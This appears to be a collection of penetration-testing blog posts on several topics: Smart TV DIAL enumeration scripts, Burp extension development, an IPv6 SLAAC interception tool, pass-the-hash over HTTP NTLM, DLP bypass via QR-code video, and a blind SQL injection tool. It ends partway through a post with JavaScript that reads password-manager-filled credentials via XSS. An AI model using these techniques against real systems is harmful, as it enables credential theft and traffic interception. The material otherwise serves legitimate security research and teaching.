Smart TV + Smartphone = Shiny New Attack Surfaces

According to a Gartner report from December 2012, “85 percent of all flat-panel TVs will be Internet-connected Smart TVs by 2016.” Forbes magazine gives some analysis about what is fueling this trend: http://www.forbes.com/sites/michaelwolf/2013/02/25/3-reasons-87-million-smart-tvs-will-be-sold-in-2013/ , The article makes a mention of “DIAL”, an enabling technology for second-screen features (which this post is about).  With these new devices come new risks as evidenced in the following article: https://securityledger.com/2012/12/security-hole-in-samsung-smart-tvs-could-allow-remote-spying/ , as well as more recent research about Smart TV risks presented at the CanSecWest and DefCon security conference this year (2013).

For more details about about exactly what features a Smart TV has above and beyond a normal television, consult this WikiPedia article: http://en.wikipedia.org/wiki/Smart_TV.

This post introduces and describes aspects of “DIAL”, a protocol developed by Google and Netflix for controlling Smart TVs with smart phones and tablets.  DIAL provides “second screen” features, which allow users to watch videos and other content on a TV using a smart phone or tablet. This article will review sample code for network discovery and enumerate Smart TV apps using this protocol.

Part 1: Discovery and Enumeration

Smart TVs are similar to other modern devices in that they have apps. Smart TVs normally ship with an app for YouTube(tm), Netflix(tm), as well as many other built-in apps. If you have a smartphone, then maybe you’ve noticed that when your smartphone and TV are on the same network, a small square icon appears in some mobile apps, allowing you to play videos on the big TV. This allows you to control the TV apps from your smartphone. Using this setup, the TV is a “first screen” device, and the phone or tablet functions as a “second screen”, controlling the first screen.

DIAL is the network protocol used for these features and is a standard developed jointly between Google and Netflix.  (See http://www.dial-multiscreen.org/ ).  DIAL stands for “Discovery and Launch”. This sounds vaguely similar to other network protocols, namely “RPC” (remote procedure call). Basically, DIAL gives devices a way to quickly locate specified networked devices (TVs) and controlling programs (apps) on those devices.

Let’s take a look at the YouTube mobile application to see how exactly this magic happens. Launching the YouTube mobile app with a Smart TV on network (turned on of course) shows the magic square indicating a DIAL-enabled screen is available:

Magic TV Square

Square appears when YouTube app finds TVs on the network.

Clicking the square provides a selection menu where the user may choose which screen to play YouTube videos. Recent versions of the YouTube apps allow “one touch pairing” which makes all of the setup easy for the user:

02_tv_picker

Let’s examine the traffic generated by the YouTube mobile app at launch.

  • The Youtube mobile app send an initial SSDP request, to discover available first-screen devices on the network.
  • The sent packet is destined for a multicast address (239.255.255.250) on UDP port 1900. Multicast is useful because devices on the local subnet can listen for it, even though it is not specifically sent to them.
  • The YouTube app multicast packet contains the string “urn:dial-multiscreen-org:service:dial:1”. A Smart TV will respond to this request, telling YouTube mobile app its network address and information about how to access it.

A broadcast search request from the YouTube mobile app looks like this:

11:22:33.361831 IP my_phone.41742 > 239.255.255.250.1900: UDP, length 125
0x0010: .......l..+;M-SE
0x0020: ARCH.*.HTTP/1.1.
0x0030: .HOST:.239.255.2
0x0040: 55.250:1900..MAN
0x0050: :."ssdp:discover
0x0060: "..MX:.1..ST:.ur
0x0070: n:dial-multiscre
0x0080: en-org:service:d
0x0090: ial:1....

Of course, the YouTube app isn’t the only program that can discover ready-to-use Smart TVs. The following is a DIAL discoverer in a few lines of python. It waits 5 seconds for responses from listening TVs. (Note: the request sent in this script is minimal. The DIAL protocol specification has a full request packet example.)

! /usr/bin/env python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(5.0)
s.sendto("ST: urn:dial-multiscreen-org:service:dial:1",("239.255.255.250",1900))
while 1:
  try:
    data,addr = s.recvfrom(1024)
    print "[*] response from %s:%d" % addr
    print data
  except socket.timeout:
    break

A response from a listening Smart TV on the network looks like:

[*] response from 192.168.1.222:1900
HTTP/1.1 200 OK
LOCATION: http://192.168.1.222:44047/dd.xml
CACHE-CONTROL: max-age=1800
EXT:
BOOTID.UPNP.ORG: 1
SERVER: Linux/2.6 UPnP/1.0 quick_ssdp/1.0
ST: urn:dial-multiscreen-org:service:dial:1
USN: uuid:bcb36992-2281-12e4-8000-006b9e40ad7d::urn:dial-multiscreen-org:service:dial:1

Notice that the TV returns a LOCATION header, with a URL: http://192.168.1.222:44047/dd.xml . The response from reading that URL leads to yet another URL which provides the “apps” link on the TV.

HTTP/1.1 200 OK
Content-Type: application/xml
Application-URL: http://192.168.1.222:60151/apps/
<?xml version="1.0"?><root xmlns="urn:schemas-upnp-org:device-1-0" xmlns:r="urn:restful-tv-org:schemas:upnp-dd”> <specVersion> <major>1</major> <minor>0</minor> </specVersion>
<device> <deviceType>urn:schemas-upnp-org:device:tvdevice:1</deviceType> <friendlyName>Vizio DTV</friendlyName> <manufacturer>Vizio Inc.</manufacturer> <modelName>Vizio_E420i_A0</modelName>
<UDN>uuid:bcb36992-2281-12e4-8000-006b9e40ad7d M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: "ssdp:discover"
MX: 3
ST: urn:schemas-upnp-org:device:MediaServer:1

At this point, the YouTube mobile app will try to access the “apps” URL combined with the application name with a GET request to: http:://192.168.1.222:60151/apps/YouTube . A positive response indicates the application is available, and returns an XML document detailing some data about the application state and feature support:

HTTP/1.1 200 OK
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<service xmlns="urn:dial-multiscreen-org:schemas:dial">
<name>YouTube</name>
<options allowStop="false"/>
<state>stopped</state>
</service>

Those of you who have been following along may have noticed how easy this has been. So far, we have sent one UDP packet and issued two GET requests. This has netted us:

  • The IP address of a Smart TV
  • The Operating system of a Smart TV (Linux 2.6)
  • Two listening web services on random high ports.
  • A RESTful control interface to the TV’s YouTube application.

If only all networked applications/attack surfaces could be discovered this easily. What should we do next? Let’s make a scanner. After getting the current list of all registered application names (as of Sept 18, 2013)  from the DIAL website, it is straightforward to create a quick and dirty scanner to find the apps on a Smart TV:

#! /usr/bin/env python
#
# Enumerate apps on a SmartTV
# <arhodes@neohapsis.com>
#
import urllib2
import sys
apps=['YouTube','Netflix','iPlayer','News','Sport','Flingo','samba',
'tv.samba','launchpad','Pandora','Radio','Hulu','KontrolTV','tv.primeguide',
'primeguide','Tester','Olympus','com.dailymotion','Dailymotion','SnagFilms',
'Twonky TV','Turner-TNT-Leverage','Turner-TBS-BBT','Turner-NBA-GameTime',
'Turner-TNT-FallingSkies','WiDi','cloudmedia','freeott','popcornhour',
'Turner-TBS-TeamCoco','RedboxInstant','YuppTV.Remote','D-Smart','D-SmartBLU',
'Turner-CNN-TVE','Turner-HLN-TVE','Turner-CN-TVE','Turner-AS-TVE',
'Turner-TBS-TVE','Turner-TNT-TVE','Turner-TRU-TVE','Gladiator','com.lge',
'lge','JustMirroring','ConnectedRedButton','sling.player.googletv','Famium',
'tv.boxee.cloudee','freesat','freetime','com.humax','humax','HKTV',
'YahooScreen','reachplus','reachplus.alerts','com.reachplus.alerts',
'com.rockettools.pludly','Grooveshark','mosisApp','com.nuaxis.lifely',
'lifely','GuestEvolutionApp','ezktv','com.milesplit.tv','com.lookagiraffe.pong',
'Crunchyroll','Vimeo','vGet','ObsidianX','com.crossproduct.caster',
'com.crossproduct.ether','Aereo','testapp3e','com.karenberry.tv',
'cloudtv','Epictv','QuicTv','HyperTV','porn','pornz','Plex','Game',
'org.enlearn.Copilot','frequency', 'PlayMovies' ]
try:
  url = sys.argv[1]
except:
  print "Usage: %s tv_apps_url" % sys.argv[0]
  sys.exit(1)

for app in apps:
  try:
    u = urllib2.urlopen("%s/%s"%(url,app))
    print "%s:%s" % ( app, repr(str(u.headers)+u.read()) )
  except:
    pass

Some of those app names appear pretty interesting. (Note to self: Find all corresponding apps.) The scanner looks for URLs returning positive responses (200 result codes and some XML), and prints them out:

 $ ./tvenum.py http://192.168.1.222:60151/apps/ 

YouTube:'Content-Type: application/xml\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<service xmlns="urn:dial-multiscreen-org:schemas:dial">\r\n  <name>YouTube</name>\r\n  <options allowStop="false"/>\r\n  <state>stopped</state>\r\n</service>\r\n'

Netflix:'Content-Type: application/xml\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<service xmlns="urn:dial-multiscreen-org:schemas:dial">\r\n  <name>Netflix</name>\r\n  <options allowStop="false"/>\r\n  <state>stopped</state>\r\n</service>\r\n'

Hopefully this article has been informative for those who may be looking for new devices and attack surfaces to investigate during application or penetration testing.

 

Burp Extensions in Python & Pentesting Custom Web Services

A lot of my work lately has involved assessing web services; some are relatively straightforward REST and SOAP type services, but some of the most interesting and challenging involve varying degrees of additional requirements on top of a vanilla protocol, or entirely proprietary text-based protocols on top of HTTP. Almost without fail, the services require some extra twist in order to interact with them; specially crafted headers, message signing (such as HMAC or AES), message IDs or timestamps, or custom nonces with each request.

These kind of unusual, one-off requirements can really take a chunk out of assessment time. Either the assessor spends a lot of time manually crafting or tampering with requests using existing tools, or spends a lot of time implementing and debugging code to talk to the service, then largely throws it away after the assessment. Neither is very good use of time.

Ideally, we’d like to write the least amount of new code in order to get our existing tools to work with the new service. This is where writing extensions to our preferred tools becomes massively helpful: a very small amount of our own code handles the unusual aspects of the service, and then we’re able to take advantage of all the nice features of the tools we’re used to as well as work almost as quickly as we would on a service that didn’t have the extra proprietary twists.

Getting Started With Burp Extensions

Burp is the de facto standard for professional web app assessments and with the new extension API (released December 2012 in r1.5.01) a lot of complexity in creating Burp extensions went away. Before that the official API was quite limited and several different extension-building-extensions had stepped in to try to fill the gap (such as Hiccup, jython-burp-api, and Buby); each individually was useful, but collectively it all resulted in confusing and contradictory instructions to anyone getting started. Fortunately, the new extension API is good enough that developing directly against it (rather than some intermediate extension) is the way to go.

The official API supports Java, Python, and Ruby equally well. Given the choice I’ll take Python any day, so these instructions will be most applicable to the parseltongues.  Getting set up to use or develop extensions is reasonably straightforward (the official Burp instructions do a pretty good job), but there are a few gotchas I’ll try to point out along the way.

  1. Make sure you have a recent version of Burp (at least 1.5.01, but preferably 1.5.04 or later where some of the early bugs were worked out of the extensions support), and a recent version of Java
  2. Download the latest Jython standalone jar. The filename will be something like “jython-standalone-2.7-b1.jar” (Event though the 2.7 branch is in beta I found it plenty stable for my use; make sure to get it so that you can use Python 2.7 features in your extensions.)
  3. In Burp, switch to the Extender tab, then the Options sub-tab. Now, configure the location of the jython jar.ConfigureJython
  4. Burp indicates that it’s optional, but go ahead and set the “Folder for loading modules” to your python site-packages directory; that way you’ll be able to make use of any system wide modules in any of your custom extensions (requests, passlib, etc). (NOTE: Some Burp extensions expect that this path will be set to the their own module directory. If you encounter errors like “ImportError: No module named Foo”, simply change the folder for loading modules to point to wherever those modules exist for the extension.)
  5. The official Burp docs include one other important step:

    Note: Because of the way in which Jython and JRuby dynamically generate Java classes, you may encounter memory problems if you load several different Python or Ruby extensions, or if you unload and reload an extension multiple times. If this happens, you will see an error like:

    java.lang.OutOfMemoryError: PermGen space

    You can avoid this problem by configuring Java to allocate more PermGen storage, by adding a -XX:MaxPermSize option to the command line when starting Burp. For example:

    java -XX:MaxPermSize=1G -jar burp.jar

  6. At this point the environment is configured; now it’s time to load an extension. The default one in the official Burp example does nothing (it defines just enough of the interface to load successfully), so we’ll go one step further. Since several of our assessments lately have involved adding some custom header or POST body element (usually for authentication or signing), that seems like a useful direction for a “Hello World”. Here is a simple extension that inserts data (in this case, a timestamp) as a new header field and at the end of the body (as a Gist for formatting). Save it somewhere on disk.
    # These are java classes, being imported using python syntax (Jython magic)
    from burp import IBurpExtender
    from burp import IHttpListener
    
    # These are plain old python modules, from the standard library
    # (or from the "Folder for loading modules" in Burp&gt;Extender&gt;Options)
    from datetime import datetime
    
    class BurpExtender(IBurpExtender, IHttpListener):
    
        def registerExtenderCallbacks(self, callbacks):
            self._callbacks = callbacks
            self._helpers = callbacks.getHelpers()
            callbacks.setExtensionName("Burp Plugin Python Demo")
            callbacks.registerHttpListener(self)
            return
    
        def processHttpMessage(self, toolFlag, messageIsRequest, currentRequest):
            # only process requests
            if not messageIsRequest:
                return
            
            requestInfo = self._helpers.analyzeRequest(currentRequest)
            timestamp = datetime.now()
            print "Intercepting message at:", timestamp.isoformat()
            
            headers = requestInfo.getHeaders()
            newHeaders = list(headers) #it's a Java arraylist; get a python list
            newHeaders.append("Timestamp: " + timestamp.isoformat())
            
            bodyBytes = currentRequest.getRequest()[requestInfo.getBodyOffset():]
            bodyStr = self._helpers.bytesToString(bodyBytes)
            newMsgBody = bodyStr + timestamp.isoformat()newMessage = self._helpers.buildHttpMessage(newHeaders, newMsgBody)
            
            print "Sending modified message:"
            print "----------------------------------------------"
            print self._helpers.bytesToString(newMessage)
            print "----------------------------------------------\n\n"
            
            currentRequest.setRequest(newMessage)
            return
    
  7. To load it into Burp, open the Extender tab, then the Extensions sub-tab. Click “Add”, and then provide the path to where you downloaded it.
  8. Test it out! Any requests sent from Burp (including Repeater, Intruder, etc) will be modified by the extension. Output is directed to the tabs in the Extender>Extensions view.
A request has been processed and modified by the extension. Since Burp doesn't currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension's tab.

A request has been processed and modified by the extension (timestamps added to the header and body of the request). Since Burp doesn’t currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension’s tab.

This is a reasonable starting place for developing your own extensions. From here it should be easy to play around with modifying the requests however you like: add or remove headers, parse or modify XML or JSON in the body, etc.

It’s important to remember as you’re developing custom extensions that you’re writing against a Java API. Keep the official Burp API docs handy, and be aware of when you’re manipulating objects from the Java side using Python code. Java to Python coercions in Jython are pretty sensible, but occasionally you run into something unexpected. It sometimes helps to manually take just the member data you need from complex Java objects, rather than figuring out how to pass the whole thing around other python code.

To reload the code and try out changes, simply untick then re-tick the “Loaded” checkbox next to the name of the extension in the Extensions sub-tab (or CTRL-click).

Jython Interactive Console and Developing Custom Extensions

Between the statically-typed Java API and playing around with code in a regular interactive Python session, it’s pretty quick to get most of a custom extension hacked together. However, when something goes wrong, it can be very annoying to not be able to drop into an interactive session and manipulate the actual Burp objects that are causing your extension to bomb.

Fortunately, Marcin Wielgoszewski’s jython-burp-api includes a an interactive Jython console injected into a Burp tab. While I don’t recommend developing new extensions against the unofficial extension-hosting-extensions that were around before the official Burp API (in 1.5.01), access to the Jython tab is a pretty killer feature that stands well on its own.

You can install the jython-burp-api just as with the demo extension in step 6 above. The extension assumes that the “Folder for loading modules” (from step 4 above) is set to its own Lib/ directory. If you get errors such as “ImportError: No module named gds“, then either temporarily change your module folder, or use the solution noted here to have the extension fix up its own path.

Once that’s working, it will add an interactive Jython shell tab into the Burp interface.

jython_interpreter

This shell was originally intended to work with the classes and objects defined jython-burp-api, but it’s possible to pull back the curtain and get access to the exact same Burp API that you’re developing against in standalone extensions.

Within the pre-defined “Burp” object is a reference to the Callbacks object passed to every extension. From there, you can manually call any of the methods available to an extension. During development and testing of your own extensions, it can be very useful to manually try out code on a particular request (which you can access from the history via getProxyHistory() ). Once you figure out what works, then that code can go into your extension.

jython_shell1

Objects from the official Burp Java API can be identified by their lack of help() strings and the obfuscated type names, but python-style exploratory programming still works as expected: the dir() function lists available fields and methods, which correspond to the Burp Java API.

Testing Web Services With Burp and SoapUI

When assessing custom web services, what we often get from customers is simply a spec document, maybe with a few concrete examples peppered throughout; actual working sample code, or real proxy logs are a rare luxury. In these cases, it becomes useful to have an interface that will be able to help craft and replay messages, and easily support variations of the same message (“Message A (as documented in spec)”, “Message A (actually working)”, “testing injections into field x”, “testing parameter overload of field y”, etc). While Burp is excellent at replaying and tampering with existing requests, the Burp interface doesn’t do a great job of helping to craft entirely new messages, or helping keep dozens of different variations organized and documented.

For this task, I turn to a tool familiar to many developers, but rather less known among pentesters: SoapUI. SoapUI calls itself the “swiss army knife of [web service] testing”, and it does a pretty good job of living up to that. By proxying it through Burp (File>Preferences>Proxy Settings) and using Burp extensions to programmatically deal with any additional logic required for the service, you can use the strengths of both and have an excellent environment for security testing against services . SoapUI Pro even includes a variety of web-service specific payloads for security testing.

SoapUI

The main SoapUI interface, populated for penetration testing against a web service. Several variations of a particular service-specific POST message are shown, each demonstrating and providing easy reproducability for a discovered vulnerability.

If the service offers a WSDL or WADL, configuring SoapUI to interact with it is straightforward; simply start a new project, paste in the URL of the endpoint, and hit okay. If the service is a REST service, or some other mechanism over HTTP, you can skip all of the validation checks and simply start manually creating requests by ticking the “Add REST Service” box in the “New SoapUI Project” dialog.

Create, manage, and send arbitrary HTTP requests without a "proper" WSDL or service description by telling SoapUI it's a REST service.

Create, manage, and send arbitrary HTTP requests without a “proper” WSDL or service description by telling SoapUI it’s a REST service.

In addition to helping you create and send requests, I find that the soapUI project file is an invaluable resource for future assessments on the same service; any other tester can pick up right where I left off (even months or years later) by loading my Burp state and my SoapUI project file.

Share Back!

This should be enough to get you up and running with custom Burp extensions to handle unusual service logic, and SoapUI to craft and manage large numbers of example messages and payloads. For Burp, there are a tons of tools out there, including official Burp examples, burpextensions.com, and findable on github. Make sure to share other useful extensions, tools, or tricks in the comments, or hit me up to discuss: @coffeetocode or @neohapsis.

Picking Up The SLAAC With Sudden Six

By Brent Bandelgar and Scott Behrens

The people that run The Internet have been clamoring for years for increased adoption of IPv6, the next generation Internet Protocol. Modern operating systems, such as Windows 8 and Mac OS X, come out of the box ready and willing to use IPv6, but most networks still have only IPv4. This is a problem because the administrators of those networks may not be expecting any IPv6 activity and only have IPv4 monitoring and defenses in place.

In 2011, Alec Waters wrote a guide on how to take advantage of the fact that Windows Vista and Windows 7 were ‘out of the box’ configured to support IPv6. Dubbed the “SLAAC Attack”, his guide described how to set up a host that advertised itself as an IPv6 router, so that Windows clients would prefer to send their requests to this IPv6 host router first, which would then resend the requests along to the legitimate IPv4 router on their behalf.

This past winter, we at Neohapsis Labs tried to recreate the SLAAC Attack to test it against Windows 8 and make it easy to deploy during our own penetration tests.

We came up with a set of standard packages and accompanying configuration files that worked, then created a script to automate this process, which we call “Sudden Six.” It can quickly create an IPv6 overlay network and the intermediate translation to IPv4 with little more than a base Ubuntu Linux or Kali Linux installation, an available IPv4 address on the target network, and about a minute or so to download and install the packages.

Windows 8 on Sudden Six

Windows 8 on Sudden Six

As with the SLAAC Attack described by Waters, this works against networks that only have IPv4 connectivity and do not have IPv6 infrastructure and defenses deployed. The attack establishes a transparent IPv6 network on top of the IPv4 infrastructure. Attackers may take advantage of Operating Systems that prefer IPv6 traffic to force those hosts to route their traffic over our IPv6 infrastructure so they can intercept and modify that communication.

To boil it down, attackers can conceivably (and fairly easily) weaponize an attack on our systems simply by leveraging this vulnerability. They could pretend to be an IPv6 router on your network and see all your web traffic, including data being sent to and from your machine. Even more lethal, the attacker could modify web pages to launch client-side attacks, meaning they could create fake websites that look like the ones you are trying to access, but send all data you enter back to the attacker (such as your username and password or credit card number).

As an example, we can imagine this type of attack being used to snoop on web traffic from employees browsing web sites. Even more lethal, the attackers could modify web pages to launch client-side attacks.

The most extreme way to mitigate the attack is to disable IPv6 on client machines. In Windows, this can be accomplished manually in each Network Adapter Properties panel or with GPO. Unfortunately, this would hinder IPv6 adoption. Instead, we would like to see more IPv6 networks being deployed, along with the defenses described in RFC 6105 and the Cisco First Hop Security Implementation Guide. This includes using features such as RA Guard, which allows administrators to configure a trusted switch port that will accept IPv6 Router Advertisement packets, indicating the legitimate IPv6 router.

At DEF CON 21, Brent Bandelgar and Scott Behrens will be presenting this attack as well as recommendations on how to protect your environment. You can find a more detailed abstract of our talk here. The talk will be held during Track 2 on Friday at 2 pm. In addition, on Friday we will be releasing the tool on the Neohapsis Github page.

Collecting Cookies with PhantomJS

TL;DR: Automate WebKit with PhantomJS to get specific Web site data.

This is the first post in a series about gathering Web site reconnaissance with PhantomJS.

My first major engagement with Neohapsis involved compiling a Web site survey for a global legal services firm. The client was preparing for a compliance assessment against Article 29 of the EU Data Protection Directive, which details disclosure requirements for user privacy and usage of cookies. The scope of the engagement involved working with their provided list of IP addresses and domain names to validate their active and inactive Web sites and redirects, count how many first party and third party cookies each site placed, identify any login forms, and determine the presence of links to site privacy policy and cookie policy.

The list was extensive and the team had a hard deadline. We had a number of tools at our disposal to scrape Web sites, but as we had a specific set of attributes to look for, we determined that our best bet was to use a modern browser engine to capture fully rendered pages and try to automate the analysis. My colleague, Ben Toews, contributed a script towards this effort that used PhantomJS to visit a text file full of URLs and capture the cookies into another file. PhantomJS is a distribution of WebKit that is intended to run in a “headless” fashion, meaning that it renders Web pages and scripts like Apple Safari or Google Chrome, but without an interactive user interface. Instead, it runs on the command line and exposes an API for JavaScript for command execution.  I was able to build on this script to build out a list of active and inactive URLs by checking the status callback from page.open and capture the cookies from every active URL as stored in page.cookies property.

Remember how I said that PhantomJS would render a Web page like Safari or Chrome? This was very important to the project as I needed to capture the Web site attributes in the same way a typical user would encounter the site. We needed to account for redirects from either the Web server or from JavaScript, and any first or third party cookies along the way. As it turns out, PhantomJS provides a way to capture URL changes with the page.OnUrlChanged callback function, which I used to log the redirects and final destination URL. The page.cookies attribute includes all first and third party cookies without any additional work as PhantomJS makes all of the needed requests and script executions already. Check out my version of the script in chs2-basic.coffee.

This is the command invocation. It takes two arguments: a text file with one URL per line and a file name prefix for the output files.


phantomjs chs2-basic.coffee [in.txt] [prefix]

This snippet writes out the cookies into a JSON string and appends it to an output file.

if status is 'success'
# output JSON of cookies from page, one JSON string per line
# format: url:(requested URL from input) pageURL:(resolved Location from the PhantomJS "Address Bar") cookie: object containing cookies set on the page
fs.write system.args[2] + ".jsoncookies", JSON.stringify({url:url,pageURL:page.url,cookie:page.cookies})+"\n", 'a'

In a followup post, I’ll discuss how to capture page headers and detect some common platform stacks.

HTTP Pass the Hash with Python

By: Ben Toews

TL;DR: Pass the Hash HTTP NTLM Authentication with Python – python-ntlm – requests

When assessing a Windows domain environment, the ability to “pass the hash” is invaluable. The technique was pioneered by Paul Ashton way back in ’97, and things have only gotten better since. Fortunately, we no longer need to patch Samba, but have reasonably functional tools like Pass-The-Hash Toolkit and msvctl.

The general aproach of these tools is to not focus on writing PTH versions of every Windows functionality, but rather to allow you to run Windows commands as another user. This means that instead of needing to patch Samba, we can just use msvctl to spawn cmd.exe and from there run the net use command. This aproach has the obvious advantage of requiring far less code.

On a recent enagement, I was attempting to access SharePoint sites using stolen hashes. My first instinct was to launch iexplore.exe using msvctl and to try to browse to the target site. The first thing I learned is that in order to get Internet Explorer to do HTTP NTLM authentication without prompting for credentials, the site you are visiting needs to be in your “Trusted Sites Zone”. Four hours later, when you figure this out, IE will use HTTP NTLM authentication, with the hash specified by msvctl, to authenticate you to the web application. This was all great, except for I was still getting a 401 from the webapp. I authenticated, but the account I was using didn’t have permissions on the SharePoint site. No problem; I have stolen thousands of users’ hashes and one of them must work, right? But what am I going to do, use msvctl to launch a few thousand instances of IE and attempt to browse the the site with each? I think not…

I took the python-ntlm module, which allows for HTTP NTLM with urllib2, and added the ability to provide a hash instead of a password. This can be found here. Then, because urllib2 is one of my least favourite APIs, I decided to write a patch for the requests library to use the python-ntlm library. This fork can be found here. I submitted a pull request to the requests project and commited my change to python-ntlm. Hopefully both of these updates will be available from pip in the near future.

So, what does all this let you do? You can now do pass-the-hash authentication with Python’s request library:

One last thing to keep in mind is that there is a difference between HTTP NTLM authentication and Kerberos HTTP NTLM authentication. This is only for the former.

DLP Circumvention: A Demonstration of Futility

By Ben Toews

TLDR: Check out the tool

I can’t say that I’m an expert in Data Loss Prevention (DLP), but I imagine its hard. The basic premise is to prevent employees or others from getting data out of a controlled environment, for example, trying to prevent the DBA from stealing everyone’s credit card numbers or the researcher from walking out the door with millions in trade secrets. DLP is even tougher in light of new techniques for moving confidential data undetected through a network.  When I demonstrated how I could do it with QR Codes, I had to rethink DLP protections.

Some quick research informs me that the main techniques for implementing DLP are to monitor and restrict access to data both physically and from networking and endpoint perspectives. Physical controls might consist of putting locks on USB ports or putting an extra locked door between your sensitive environment and the rest of the world. Networking controls might consist of firewalls, IDS, content filtering proxies, or maybe just unplugging the sensitive network from the rest of the network and the internet.

Many security folks joke about the futility of this effort. It seems that a determined individual can always find a way around these mechanisms. To demonstrate, my co-worker, Scott Behrens, was working on a Python script to convert files to a series of QR Codes (2d bar codes) that could be played as a video file. This video could then be recorded and decoded by a cell-phone camera and and stored as files on another computer. However, it seemed to me that with the new JavaScript/HTML5 file APIs, all the work of creating the QR Code videos could be done in the browser, avoiding the need to download a Python script/interpreter.

I was talking with a former co-worker, about this idea and he went off and wrote a HTML5/JS encoder and a ffmpeg/bash/ruby decoder that seemed to work pretty well. Not wanting to be outdone, I kept going and wrote my own encoder and decoder.

My encoder is fairly simple. It uses the file API to read in multiple files from the computer, uses Stuart Knightley’s JSZip library to create a single ZIP file, and then Kazuhiko Arase’s JavaScript QRCode Generator to convert this file into a series of QRCodes. It does this all in the browser without requiring the user to download any programs or transmit any would-be-controlled data over the network.

The decoder was a little bit less straight-forward. I have been wanting to learn about OpenCV for a non-security related side project, so I decided to use it for this. It turns out that it is not very entirely easy to use and its documentation is somewhat lacking. Still, I persevered and wrote a Python tool to:

  1. Pull images from the video and analyze their color.
  2. Identify the spaces between frames of QRCodes (identified by a solid color image).
  3. Pull the QRCode frames between these marker frames.
  4. Feed them into a ZBar ImageScanner and get the data out.

The tool seems to work pretty well. Between my crummy cellphone camera and some mystery frames that ZBar refuses to decode, it isn’t the most reliable tool for data transfer, but is serves to make a point. Feel free to download both the encoder and decoder from my GitHub Repo or checkout the live demo and let me know what you think. I haven’t done any benchmarking for data bandwidth, but it seems reasonable to use the tool for files several megabytes in size.

To speak briefly about preventing the use of tools like this for getting data of your network: As with most things in security, finding a balance between usability and security is the key. The extreme on the end of usability would be to keep an entirely open network without any controls to prevent or detect data loss. The opposite extreme would be to unplug all your computers and shred their hard drives. Considerations in finding the medium as it relates to DLP include:

  • The value of your data to your organization.
  • The value of your data to your adversaries.
  • The means of your organization to implement security mechanisms.
  • The means of your adversaries to defeat security mechanisms.

Once your organization has decided what its security posture should be, it can attempt to mitigate risk accordingly. What risk remains must be accepted. For most organizations, the risk presented by a tool like the one described above is acceptable. That being said, techniques for mitigating its risk might include:

  • Disallowing video capture devices in sensitive areas (already common practice in some organizations).
  • Writing IDS signatures for the JavaScript used to generate the QRCodes (this is hard because JS is easily obfuscated and packed).
  • Limiting access within your organization to sensitive information.
  • Trying to prevent the QRCode-creating portion of the tool from reaching your computers.
    • Physical Protections (USB port locks, removing CD Drives, etc.)
    • Network Protections (segmentation,content filtering, etc.)

Good luck ;)

Apparently the word ‘QR Code’ is registered trademark of DENSO WAVE INCORPORATED

DEF CON 20 – Neohapsis New Tool BBQSQL to Make its Debut!

By Scott Behrens and Ben Toews

Ben and I have been grinding away on slides and code in preparation of our talk at DefCon 20.  Without letting all of the cats out of the bag, I wanted to take a second to provide a little more context into our talk and research before we present our new tools at the conference.

BBQSQL is a SQL injection framework specifically designed to be hyper fast, database agnostic, easy to setup, and easy to modify.  The tool is extremely effective at exploiting a particular type of SQL injection flaw known as blind/semi-blind SQL injection.  When doing application security assessments we often uncover SQL vulnerabilities that are difficult to exploit. While current tools have an enormous amount of capability, when you can’t seem to get them to work you are out of luck.  We frequently end up writing custom scripts to help aid in the tricky data extraction, but a lot of time is invested in developing, testing and debugging these scripts.

BBQSQL helps automate the process of exploiting tricky blind SQL injection.  We developed a very easy UI to help you setup all the requirements for your particular vulnerability and provide real time configuration checking to make sure your data looks right.  On top of being easy to use, it was designed using the event driven concurrency provided by Python’s gevent.  This allows BBQSQL to run much faster than existing single/multithreaded applications.

We will be going into greater detail on the benefits of this kind of concurrency during the talk. We also will talk a bit about character frequency analysis and some ways BBQSQL uses it to extract data faster.  Will be doing a demo too to show you how to use the UI as well as import and export attack configs.  Here are a few screenshots to get you excited!

BBQSQL User Interface

BBQSQL Performing Blind SQL Injection

If you come see the talk, we would love to hear your thoughts!

Abusing Password Managers with XSS

By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies. This will generally prevent an attacker from stealing users’ session cookies with XSS. There are ways of circumventing this (e.g. the HTTP TRACE method), but generally speaking, it is fairly effective. That being said, an attacker can still cause significant damage without being able to steal the session cookie.

A variety of client-side attacks are possible, but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections via XSS and thereby submit various forms within the application. The worst case scenario with this type of attack would be that there is no confirmation for email address or password changes and the attacker can change users’ passwords. From an attacker’s perspective this is valuable, but not as valuable as being able to steal a user’s session. By reseting the password, the attacker is giving away his presence and the extent to which he is able to masquarade as another user is limited. While stealing the session cookie may be the most commonly cited method for hijacking user accounts, other means not involving changing user passwords exist.

All modern browsers come with some functionality to remember user passwords. Additionally, users will often install third-party applications to manage their passwords for them. All of these solutions save time for the user and generally help to prevent forgotten passwords. Third party password managers such as LastPass are also capable of generating strong, application specific passwords for users and then sending them off to the cloud for storage. Functionality such as this greatly improves the overall security of the username/password authentication model. By encouraging and facilitating the use of strong application specific passwords, users need not be as concerned with unreliable web applications that inadequately protect their data. For these and other reasons, password managers such as LastPass are generally considered within the security industry to be a good idea. I am a long time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser as well as third-party password managers that gets hardly any attention is how these can be abused by XSS. Because many of these password managers automatically fill login forms, an attacker can use JavaScript to read the contents of the form once it has been filled. The lack of attention this topic receives made me curious to see how exploitable it actually would be. For the purpose of testing, I built a simple PHP application with a functional login page aswell as a second page that is vulnerable to XSS (find them here). I then proceded to experiment with different JavaScript, attempting to steal user credentials with XSS from the following password managers:

  • LastPass (Current version as of April 2012)
  • Chrome (version 17)
  • Firefox (version 11)
  • Internet Explorer (version 9)

I first visited my login page and entered my password. If the password manager asked me if I wanted it to be remembered, I said yes. I then went to the XSS vulnerable page in my application and experimented with different JavaScript, attempting to access the credentials stored by the browser or password manager. I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

<script type="text/javascript">
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' | ex_password != ''){
            document.getElementById('xss').style.display = 'none'
